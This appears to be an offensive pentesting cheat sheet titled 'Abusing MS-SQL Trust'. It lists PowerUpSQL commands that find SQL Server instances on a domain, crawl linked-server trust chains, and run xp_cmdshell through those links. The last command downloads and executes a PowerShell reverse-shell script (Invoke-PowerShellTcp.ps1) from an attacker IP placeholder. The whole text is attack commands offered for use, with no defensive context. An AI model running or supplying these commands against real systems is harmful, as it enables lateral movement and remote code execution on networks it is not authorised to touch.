ABUSING MS-SQL TRUST
Get-SQLInstanceDomainGet-SQLInstanceDomain | Get-SQLServerInfoGet-SQLInstanceDomain | Get-SQLServerLinkGet-SQLServerLink -Instance <MS-SQL INSTANCE>Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE>Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE> -Query "<QUERY>"Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE> -Query "exec master..xp_cmdshell 'whoami'"Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE> -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http:// <IP>/Invoke-PowerShellTcp.ps1'')"'Last updated